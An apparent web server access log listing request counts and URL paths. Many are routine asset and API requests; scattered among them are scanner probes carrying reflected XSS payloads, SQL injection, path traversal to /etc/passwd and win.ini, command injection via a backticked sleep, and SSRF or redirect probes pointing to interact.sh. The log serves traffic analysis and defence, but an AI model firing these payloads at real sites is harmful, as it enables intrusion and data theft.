1	GET	`/Home/Bind/binding`	HTTP/1.1
1	GET	`/Home/Get/getJnd28`	HTTP/1.1
1	GET	`/Home/GetAllGameCategory`	HTTP/1.1
1	GET	`/Home/GetInitSource`	HTTP/1.1
1	GET	`/Home/Index/ajaxTJ`	HTTP/1.1
1	GET	`/JS/loginstatus.js`	HTTP/1.1
1	GET	`/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh`	HTTP/1.1
1	GET	`/OA_HTML/ibeCAcpSSOReg.jsp`	HTTP/1.1
1	GET	`/Pay_Index.html`	HTTP/1.1
1	GET	`/Pc/Lang/index.html`	HTTP/1.1
1	GET	`/Public/Home/ecshe_css/main.css?v=1543997196`	HTTP/1.1
1	GET	`/Public/Home/js/cls.js`	HTTP/1.1
1	GET	`/Public/Mobile/ecshe_css/wapmain.css?v=1545408652`	HTTP/1.1
1	GET	`/Public/Wchat/css/index.css`	HTTP/1.1
1	GET	`/Public/Wchat/js/cvphp.js`	HTTP/1.1
1	GET	`/Public/css/_pk10.css`	HTTP/1.1
1	GET	`/Public/css/errorCss.css`	HTTP/1.1
1	GET	`/Public/css/hall.css`	HTTP/1.1
1	GET	`/Public/home/common/js/index.js`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/Public/home/js/fukuang.js`	HTTP/1.1
1	GET	`/Public/home/wap/css/qdgame.css`	HTTP/1.1
1	GET	`/Public/initJs.php`	HTTP/1.1
1	GET	`/Public/js/common.js`	HTTP/1.1
1	GET	`/Public/uploads/web/step1.png`	HTTP/1.1
1	GET	`/Res/font/font.css`	HTTP/1.1
1	GET	`/Scripts/common.js`	HTTP/1.1
1	GET	`/T9sA/static/image/t-06.jpg`	HTTP/1.1
1	GET	`/Template/Mobile/js/main.js`	HTTP/1.1
1	GET	`/Templates/user/finance/css/userPay.css`	HTTP/1.1
1	GET	`/Templates/user/js/global.js`	HTTP/1.1
1	GET	`/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD`	HTTP/1.1
1	GET	`/__r2/query-printRows.view?query.containerFilterName=CurrentAndSubfolders&query.queryName=ListManager&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&schemaName=ListManager`	HTTP/1.1
1	GET	`/a/`	HTTP/1.1
1	GET	`/a/other/codepay/js/codepay_util.js`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/webadmin.php?mod=do&act=login`	HTTP/1.1
1	GET	`/admin`	HTTP/1.1
1	GET	`/ajax/allcoin_a/id/0?t=0.3782499195965951`	HTTP/1.1
1	GET	`/anquan/qgga.asp`	HTTP/1.1
1	GET	`/api/Index/getLottery`	HTTP/1.1
1	GET	`/api/Index/getconfig`	HTTP/1.1
1	GET	`/api/appVersion?mobile_system=2`	HTTP/1.1
1	GET	`/api/apps/config`	HTTP/1.1
1	GET	`/api/apps`	HTTP/1.1
1	GET	`/api/config-init`	HTTP/1.1
1	GET	`/api/config/info`	HTTP/1.1
1	GET	`/api/config/proxy_servers?key=1`	HTTP/1.1
1	GET	`/api/config`	HTTP/1.1
1	GET	`/api/contactWay`	HTTP/1.1
1	GET	`/api/currency/quotation_new`	HTTP/1.1
1	GET	`/api/customerServiceLink`	HTTP/1.1
1	GET	`/api/exclude/siteConfig/webSiteConfig`	HTTP/1.1
1	GET	`/api/getconfig.aspx`	HTTP/1.1
1	GET	`/api/grame/getHomePtLottery`	HTTP/1.1
1	GET	`/api/help_documents/nitice_list`	HTTP/1.1
1	GET	`/api/hevent`	HTTP/1.1
1	GET	`/api/home_index`	HTTP/1.1
1	GET	`/api/ht/xy1`	HTTP/1.1
1	GET	`/api/im/v2/app/config`	HTTP/1.1
1	GET	`/api/index/config`	HTTP/1.1
1	GET	`/api/index/grailindex`	HTTP/1.1
1	GET	`/api/index/index`	HTTP/1.1
1	GET	`/api/index/webconfig`	HTTP/1.1
1	GET	`/api/index`	HTTP/1.1
1	GET	`/api/linkPF`	HTTP/1.1
1	GET	`/api/lottery/color`	HTTP/1.1
1	GET	`/api/message/webInfo`	HTTP/1.1
1	GET	`/api/public/?service=Home.getConfig`	HTTP/1.1
1	GET	`/api/settings/values`	HTTP/1.1
1	GET	`/api/shares/hqStrList`	HTTP/1.1
1	GET	`/api/site/getInfo.do`	HTTP/1.1
1	GET	`/api/st/index/?ac=2`	HTTP/1.1
1	GET	`/api/stock/getSingleStock.do?code=002405`	HTTP/1.1
1	GET	`/api/sys/var`	HTTP/1.1
1	GET	`/api/uploads/apimap`	HTTP/1.1
1	GET	`/api/user/dataDictionaryService/list`	HTTP/1.1
1	GET	`/api/user/index`	HTTP/1.1
1	GET	`/api/user/ismustmobile`	HTTP/1.1
1	GET	`/api/user_center/help.html`	HTTP/1.1
1	GET	`/api/v/index/queryOfficePage?officeCode=customHomeLink`	HTTP/1.1
1	GET	`/api/v1/about`	HTTP/1.1
1	GET	`/api/v1/config`	HTTP/1.1
1	GET	`/api/v1/member/kefu`	HTTP/1.1
1	GET	/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27	HTTP/1.1
1	GET	`/api/vue/transaction/config`	HTTP/1.1
1	GET	`/apiApp/app/site/info`	HTTP/1.1
2	GET	`/api`	HTTP/1.1
1	GET	`/apiapp/Ygn_Girl.CityList`	HTTP/1.1
3	GET	`/app/`	HTTP/1.1
1	GET	`/app/common/getRegisterSet`	HTTP/1.1
1	GET	`/app/config/getConfig`	HTTP/1.1
1	GET	`/app/js/base.js`	HTTP/1.1
1	GET	`/appxz/index.html`	HTTP/1.1
1	GET	`/assets/AssetManifest.json`	HTTP/1.1
1	GET	`/assets/app-manifest.json`	HTTP/1.1
1	GET	`/assets/etc/query.css`	HTTP/1.1
1	GET	`/assets/extension/market/css/mt4.css`	HTTP/1.1
1	GET	`/assets/images/dy.jpg`	HTTP/1.1
1	GET	`/assets/images/redian.jpg`	HTTP/1.1
1	GET	`/assets/js/dmshub.js`	HTTP/1.1
1	GET	`/assets/mstock/newimg/guid-info.png`	HTTP/1.1
1	GET	`/assets/res/mods/room.js`	HTTP/1.1
1	GET	`/assets/shebao/banner.png`	HTTP/1.1
1	GET	`/assets/source/list.css`	HTTP/1.1
1	GET	`/assets/yibao/Nweshebao/img/icon2.png`	HTTP/1.1
1	GET	`/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/banner.do?code=1`	HTTP/1.1
1	GET	`/bapi/st/news/`	HTTP/1.1
1	GET	`/baseConfig`	HTTP/1.1
1	GET	`/bet/lotteryinfo/allLotteryInfoList`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/bugs/verify.php?confirm_hash&id=1`	HTTP/1.1
1	GET	`/card_scan.php?CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&No=0000&ReaderNo=0000`	HTTP/1.1
1	GET	`/card_scan.php?CardFormatNo=123&No=123&ReaderNo=`sleep%207``	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272Li9JO509EsaAkdvpQvEabymdmZ%27)%3C/script%3E`	HTTP/1.1
1	GET	`/chat.html`	HTTP/1.1
1	GET	`/client/api/findConfigByKey?configKey=level_config`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/client/index.php`	HTTP/1.1
1	GET	`/client/static/icon/hangqingicon.png`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/code/js/config.js`	HTTP/1.1
1	GET	`/common.js`	HTTP/1.1
1	GET	`/common/member/js/user.util.js`	HTTP/1.1
1	GET	`/common/template/lottery/lecai/css/style.css`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
8	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/config`	HTTP/1.1
1	GET	`/csjs/bankCheck.js`	HTTP/1.1
1	GET	`/css/all.css`	HTTP/1.1
1	GET	`/css/m.css`	HTTP/1.1
1	GET	`/css/main.css`	HTTP/1.1
1	GET	`/css/nsc/reset.css`	HTTP/1.1
1	GET	`/css/other.css`	HTTP/1.1
1	GET	`/css/scanner.css`	HTTP/1.1
1	GET	`/css/skin/ymPrompt.css`	HTTP/1.1
1	GET	`/css/style.css`	HTTP/1.1
1	GET	`/d1/OK.php`	HTTP/1.1
1	GET	`/data/json/config.json`	HTTP/1.1
1	GET	`/data/ticker_24hr`	HTTP/1.1
1	GET	`/detail1/js/add.js`	HTTP/1.1
1	GET	`/detaila/images/header_v1b.css`	HTTP/1.1
1	GET	`/detaila/images/logo.png`	HTTP/1.1
1	GET	`/ding/`	HTTP/1.1
1	GET	`/dist/images/mask/bg1.jpg`	HTTP/1.1
1	GET	`/dist/images/mask/guide/cn/step1.jpg`	HTTP/1.1
1	GET	`/docpicker/internal_proxy/http/interact.sh`	HTTP/1.1
1	GET	`/dolibarr/adherents/cartes/carte.php?foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=cardlogin&model=5160&optioncss=print`	HTTP/1.1
1	GET	`/elFinder/php/connector.minimal.php?cmd=mkfile&name=2Li9JOhpNu9ZTbpycVX5ljGtlBH[.]php:aaa&target=l1_Lw`	HTTP/1.1
1	GET	`/errors.log`	HTTP/1.1
1	GET	`/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\"user\|s.\"1337\"`	HTTP/1.1
11	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fePublicInfo/`	HTTP/1.1
1	GET	`/files/pub_rem.js`	HTTP/1.1
1	GET	`/files/pub_reset.css`	HTTP/1.1
1	GET	`/fmlurlsvc/?url=https%3A%2F%2Fgoogle[.]com<Svg%2Fonload%3Dalert(document.domain)>`	HTTP/1.1
1	GET	`/formLoginAuth.htm?action=login&authCode=1&goURL&userName=admin`	HTTP/1.1
1	GET	`/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini`	HTTP/1.1
1	GET	`/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini`	HTTP/1.1
2	GET	`/freepbx/recordings/theme/main.css`	HTTP/1.1
1	GET	`/friendGroup/list`	HTTP/1.1
1	GET	`/front/index/getSiteSetting`	HTTP/1.1
1	GET	`/getConfig/getArticle.do?code=19`	HTTP/1.1
1	GET	`/getConfig/getArticle.do?code=1`	HTTP/1.1
1	GET	`/getConfig/listPopFrame.do?code=1&position=index&_=1601489645097`	HTTP/1.1
1	GET	`/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097`	HTTP/1.1
1	GET	`/getLocale`	HTTP/1.1
1	GET	`/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/h5/`	HTTP/1.1
1	GET	`/h5/static/cert/icon_yanzhengma.png`	HTTP/1.1
1	GET	`/h5/static/tabbar/txl.png`	HTTP/1.1
2	GET	`/h5`	HTTP/1.1
1	GET	`/hLscK0Dr6CnXQukTotSZR2fjw1Q`	HTTP/1.1
1	GET	`/hetong/yq?id=500`	HTTP/1.1
1	GET	`/home/GetQrCodeInfo`	HTTP/1.1
1	GET	`/home/`	HTTP/1.1
1	GET	`/home/banner/getLogo`	HTTP/1.1
1	GET	`/home/help`	HTTP/1.1
1	GET	`/home/login.jpg`	HTTP/1.1
1	GET	`/home/login/login_index.html`	HTTP/1.1
1	GET	`/home/main/login`	HTTP/1.1
2	GET	`/homes/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/im/App/config`	HTTP/1.1
1	GET	`/im/`	HTTP/1.1
1	GET	`/im/h5/`	HTTP/1.1
1	GET	`/im/in/GetUuid`	HTTP/1.1
1	GET	`/images/favicon.ico`	HTTP/1.1
1	GET	`/images/no.jpg`	HTTP/1.1
1	GET	`/images/src_images_but_dianz_s.png`	HTTP/1.1
1	GET	`/img/close.png`	HTTP/1.1
1	GET	`/img/phonetrackeronline.png`	HTTP/1.1
1	GET	`/img/subsidy/kh.png`	HTTP/1.1
1	GET	`/img/xxing.png`	HTTP/1.1
1	GET	`/img/zllqdk.png`	HTTP/1.1
1	GET	`/index.php/Wap/Api/getBanner`	HTTP/1.1
1	GET	`/index.php/Wap/Api/getSystemNotice?id=1`	HTTP/1.1
1	GET	`/index.php/sign`	HTTP/1.1
1	GET	`/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_realtyna`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_bfsurvey`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_mmsblog`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../etc/passwd%00&option=com_dwgraphs`	HTTP/1.1
1	GET	`/index.php?include_file=../../../../../../etc/passwd&option=com_pro_desk`	HTTP/1.1
1	GET	`/index.php?m=api&c=app&a=getPlatformConfig`	HTTP/1.1
1	GET	`/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19--+`	HTTP/1.1
1	GET	`/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/index/`	HTTP/1.1
1	GET	`/index/api/getconfig`	HTTP/1.1
1	GET	`/index/aurl`	HTTP/1.1
1	GET	`/index/common.css`	HTTP/1.1
1	GET	`/index/gzid.js`	HTTP/1.1
1	GET	`/index/home/login.html`	HTTP/1.1
1	GET	`/index/images/tradeicon.png`	HTTP/1.1
1	GET	`/index/index/getchatLog`	HTTP/1.1
1	GET	`/index/index/info/`	HTTP/1.1
1	GET	`/index/login/index.html`	HTTP/1.1
1	GET	`/index/login/index`	HTTP/1.1
1	GET	`/index/login/login`	HTTP/1.1
1	GET	`/index/login/reg.html`	HTTP/1.1
1	GET	`/index/login/register`	HTTP/1.1
1	GET	`/index/login`	HTTP/1.1
1	GET	`/index/newapi/api`	HTTP/1.1
1	GET	`/index/open/login.html`	HTTP/1.1
1	GET	`/index/police/index.html?agent=1000`	HTTP/1.1
1	GET	`/index/user/get_server_info`	HTTP/1.1
1	GET	`/index/user/login.html`	HTTP/1.1
1	GET	`/index_files/bankCheck.js`	HTTP/1.1
1	GET	`/index`	HTTP/1.1
1	GET	`/infe/rest/fig/advertise/common.json?mobile_open=1`	HTTP/1.1
1	GET	`/install.inc/vipsignInstall.css`	HTTP/1.1
1	GET	`/ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member`	HTTP/1.1
1	GET	`/jiaoyimao/`	HTTP/1.1
1	GET	`/jiaoyimao/default.css`	HTTP/1.1
1	GET	`/jobmanager/logs/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc%25252fpasswd`	HTTP/1.1
1	GET	`/js/a.script`	HTTP/1.1
1	GET	`/js/app.js`	HTTP/1.1
1	GET	`/js/base1.js`	HTTP/1.1
1	GET	`/js/basic.js`	HTTP/1.1
1	GET	`/js/bk.min.js`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/home.js`	HTTP/1.1
1	GET	`/js/index.js`	HTTP/1.1
1	GET	`/js/lang.js`	HTTP/1.1
1	GET	`/js/options.js`	HTTP/1.1
1	GET	`/js/post.js/`	HTTP/1.1
1	GET	`/js/pups.js`	HTTP/1.1
1	GET	`/js/subsidy/bk.min.js`	HTTP/1.1
1	GET	`/js/xz.js`	HTTP/1.1
1	GET	`/jym-wn/`	HTTP/1.1
1	GET	`/kkrps/im_group/show_members`	HTTP/1.1
1	GET	`/langConfig.js`	HTTP/1.1
1	GET	`/language/lang`	HTTP/1.1
1	GET	`/lanren/css/global.css`	HTTP/1.1
1	GET	`/leftDao.php?callback=jQuery183016740860980352856_1604309800583`	HTTP/1.1
1	GET	`/loan/css/index.css`	HTTP/1.1
1	GET	`/login.htm`	HTTP/1.1
2	GET	`/login.html`	HTTP/1.1
1	GET	`/login?redirect=%2F`	HTTP/1.1
1	GET	`/loginLess/../../etc/passwd`	HTTP/1.1
2	GET	`/login`	HTTP/1.1
1	GET	`/logout?next=%208%22onmouseover=%22alert(document.domain)`	HTTP/1.1
1	GET	`/lottery/lottery_list`	HTTP/1.1
1	GET	`/m/`	HTTP/1.1
1	GET	`/m/allticker/1`	HTTP/1.1
1	GET	`/m/env.js`	HTTP/1.1
1	GET	`/magmi/web/info.php`	HTTP/1.1
1	GET	`/main`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/js/left.js`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/mantis/verify.php?confirm_hash&id=1`	HTTP/1.1
1	GET	`/mantisBT/verify.php?confirm_hash&id=1`	HTTP/1.1
1	GET	`/mantisbt-2.3.0/verify.php?confirm_hash&id=1`	HTTP/1.1
1	GET	`/market/market-ws/iframe.html`	HTTP/1.1
1	GET	`/masterControl/getSystemSetting`	HTTP/1.1
1	GET	`/media/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/member/js/lang_zh_CN.js`	HTTP/1.1
1	GET	`/message?msg=%26%23%3Csvg/onload=alert(1337)%3E%3B&title=x`	HTTP/1.1
1	GET	`/messages`	HTTP/1.1
1	GET	`/mg/other/codepay/js/codepay_util.js`	HTTP/1.1
1	GET	`/mindex.html`	HTTP/1.1
1	GET	`/mmj/index.html`	HTTP/1.1
1	GET	`/mobile/`	HTTP/1.1
1	GET	`/mobile/config.js`	HTTP/1.1
1	GET	`/mobile/css/base.css`	HTTP/1.1
1	GET	`/mobile/lists.html`	HTTP/1.1
1	GET	`/mobile/login.html`	HTTP/1.1
1	GET	`/mobile/lottery/list`	HTTP/1.1
1	GET	`/mobile/v3/appSuperDownload.do`	HTTP/1.1
1	GET	`/mobile21/js/index/gameManagement.js?v=7`	HTTP/1.1
1	GET	`/mobile`	HTTP/1.1
1	GET	`/module/smartblog/archive?day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&month=1&year=1`	HTTP/1.1
1	GET	`/myConfig.js`	HTTP/1.1
1	GET	`/mytio/config/base`	HTTP/1.1
1	GET	`/newApp/winMessTopQuery.php`	HTTP/1.1
1	GET	`/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/nyyh/chkjs.js`	HTTP/1.1
1	GET	`/nyyh/game.css`	HTTP/1.1
1	GET	`/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==`	HTTP/1.1
1	GET	`/openApi/systemConfig/findSystemConfigById?id=3`	HTTP/1.1
1	GET	`/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd`	HTTP/1.1
1	GET	`/otc/`	HTTP/1.1
1	GET	`/other/codepay/js/codepay_util.js`	HTTP/1.1
1	GET	`/other/getTopQuestion`	HTTP/1.1
1	GET	`/pages/console/js/common.js`	HTTP/1.1
1	GET	`/paint/`	HTTP/1.1
1	GET	`/payform.php?note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&price=123&t=1&type=upgrade&upgradegd=6&upgradeid=1`	HTTP/1.1
1	GET	`/ph_acquireSession`	HTTP/1.1
1	GET	`/phalapi/public/?s=System.index`	HTTP/1.1
1	GET	`/phalapi/public/`	HTTP/1.1
1	GET	`/phone/images/icon_01.png`	HTTP/1.1
1	GET	`/platform`	HTTP/1.1
1	GET	`/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa&view=menu`	HTTP/1.1
1	GET	`/plugins/servlet/Wallboard/?cyclePeriod=alert(document.domain)&dashboardId=10000&dashboardId=10000`	HTTP/1.1
1	GET	`/plus/feedback.php/rp4hu%2527%3E%3Cscript%3Ealert%2528document.domain%2529%3C%252fscript%3E?aid=3`	HTTP/1.1
1	GET	`/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C`	HTTP/1.1
1	GET	`/portal/index/protocol.html`	HTTP/1.1
1	GET	`/projectConfig`	HTTP/1.1
1	GET	`/proxy/games`	HTTP/1.1
1	GET	`/proxy/settings`	HTTP/1.1
1	GET	`/public/css/style.css`	HTTP/1.1
1	GET	`/public/h5static/js/main.js`	HTTP/1.1
1	GET	`/public/img/cz1.png`	HTTP/1.1
1	GET	`/public/static/css/public.css`	HTTP/1.1
1	GET	`/public/static/home/js/moblie/login.js`	HTTP/1.1
1	GET	`/public/static/index/picture/img_33.png`	HTTP/1.1
1	GET	`/public/wap/js/basis.js`	HTTP/1.1
1	GET	`/reg.php`	HTTP/1.1
1	GET	`/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E`	HTTP/1.1
1	GET	`/res/common/addfriend.png`	HTTP/1.1
1	GET	`/res/kuai/1.css`	HTTP/1.1
1	GET	`/res/kuai/21.css`	HTTP/1.1
1	GET	`/resource/home/css/person.css`	HTTP/1.1
1	GET	`/resource/home/js/common.js`	HTTP/1.1
1	GET	`/resources/css/headernav.css`	HTTP/1.1
1	GET	`/resources/main/common.js`	HTTP/1.1
1	GET	`/rest/api/2/user/picker?query`	HTTP/1.1
1	GET	`/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(2Li9JOmLZk13NIRgkh9Vefl07kQ)%3c%2fscript%3e&win=2707`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/room/getRoomBangFans`	HTTP/1.1
1	GET	`/room/script/face.js`	HTTP/1.1
1	GET	`/s/2Li9JNT9hnGDxvgCIKcdocf6WU5/_/%252e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml`	HTTP/1.1
1	GET	`/s/2Li9JNT9hnGDxvgCIKcdocf6WU5/_/%252e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml`	HTTP/1.1
1	GET	`/s_api/basic/config_js?callback=__set_config`	HTTP/1.1
1	GET	`/s_api/basic/download/info`	HTTP/1.1
1	GET	`/saconfig/secure/yunwei.js`	HTTP/1.1
1	GET	`/sdk.html`	HTTP/1.1
1	GET	`/server/business/api/customer/list`	HTTP/1.1
1	GET	`/service?action=getBasicInfo&terminal_id=2&token=&debug=true`	HTTP/1.1
1	GET	`/set_safety.shtml?r=52300`	HTTP/1.1
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site.js`	HTTP/1.1
1	GET	`/site/get-hq?proNo=btc&panType=1&pid=1`	HTTP/1.1
1	GET	`/site/info`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/skin/js/common.js`	HTTP/1.1
1	GET	`/skin/main/onload.js`	HTTP/1.1
1	GET	`/source/20220119/static/wap/css/trade-history.css`	HTTP/1.1
1	GET	`/source/20220119/static/wap/js/order.js`	HTTP/1.1
1	GET	`/stage-api/common/configKey/all`	HTTP/1.1
1	GET	`/static/Common.css`	HTTP/1.1
1	GET	`/static/Mobile/js/common.js`	HTTP/1.1
1	GET	`/static/_zxzx/bottom/index_bottom.shtml`	HTTP/1.1
1	GET	`/static/admincp/js/common.js`	HTTP/1.1
1	GET	`/static/common/js/common.js`	HTTP/1.1
1	GET	`/static/common/js/vant/vant.min.js`	HTTP/1.1
1	GET	`/static/config.js`	HTTP/1.1
1	GET	`/static/content.html`	HTTP/1.1
1	GET	`/static/css/index.css`	HTTP/1.1
1	GET	`/static/css/mobile.css`	HTTP/1.1
1	GET	`/static/css/public.css`	HTTP/1.1
1	GET	`/static/css/reset.css`	HTTP/1.1
1	GET	`/static/customer/js/xiaotian.cli.v2.js`	HTTP/1.1
1	GET	`/static/data/configjs.js`	HTTP/1.1
1	GET	`/static/data/gamedatas.js`	HTTP/1.1
1	GET	`/static/data/thirdgames.json`	HTTP/1.1
1	GET	`/static/diff_worker.js`	HTTP/1.1
1	GET	`/static/f_title.png`	HTTP/1.1
1	GET	`/static/guide/ab.css`	HTTP/1.1
1	GET	`/static/home/2022/index1.js`	HTTP/1.1
1	GET	`/static/home/css/common.css`	HTTP/1.1
1	GET	`/static/home/css/css.css`	HTTP/1.1
1	GET	`/static/home/css/feiqi-ee5401a8e6.css`	HTTP/1.1
1	GET	`/static/home/imgs/jkjl.png`	HTTP/1.1
1	GET	`/static/home/imgs/pico.png`	HTTP/1.1
1	GET	`/static/home/js/rooms.js`	HTTP/1.1
1	GET	`/static/image/bg1.jpg`	HTTP/1.1
1	GET	`/static/image/logo.png?v=4`	HTTP/1.1
1	GET	`/static/images/login_bg.jpg`	HTTP/1.1
1	GET	`/static/img/bitbeb-logo.png`	HTTP/1.1
1	GET	`/static/index/3.png`	HTTP/1.1
1	GET	`/static/index/css/trade-history.css`	HTTP/1.1
1	GET	`/static/index/js/lk/order.js`	HTTP/1.1
1	GET	`/static/js/app.js`	HTTP/1.1
1	GET	`/static/js/chat-config.js`	HTTP/1.1
1	GET	`/static/js/config.js`	HTTP/1.1
1	GET	`/static/js/download.js`	HTTP/1.1
1	GET	`/static/js/user.js`	HTTP/1.1
1	GET	`/static/js/view.js`	HTTP/1.1
1	GET	`/static/local/img/userCenter/hourlyPrivilege.svg`	HTTP/1.1
1	GET	`/static/m_text.png`	HTTP/1.1
1	GET	`/static/mobile/css/feiqi.css`	HTTP/1.1
1	GET	`/static/mobile/user.html`	HTTP/1.1
1	GET	`/static/tabBar/trade.png`	HTTP/1.1
1	GET	`/static/v/v2/image/star.png`	HTTP/1.1
1	GET	`/static/v2/css/index.css`	HTTP/1.1
1	GET	`/static/voice/default.wav`	HTTP/1.1
1	GET	`/static/wap/css/common.css`	HTTP/1.1
1	GET	`/static/wap/css/index.css`	HTTP/1.1
1	GET	`/static/wap/css/tipmask.css`	HTTP/1.1
1	GET	`/static/wap/css/trade-history.css`	HTTP/1.1
1	GET	`/static/wap/js/common.js`	HTTP/1.1
1	GET	`/static/wap/js/order.js`	HTTP/1.1
1	GET	`/statics/js/API.js`	HTTP/1.1
1	GET	`/step1.asp`	HTTP/1.1
1	GET	`/stock/mzhishu`	HTTP/1.1
1	GET	`/stock/search.html?keyword=00202`	HTTP/1.1
1	GET	`/stock2c1/api/site/getInfo.do`	HTTP/1.1
1	GET	`/sucai/zxkf.png`	HTTP/1.1
1	GET	`/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==`	HTTP/1.1
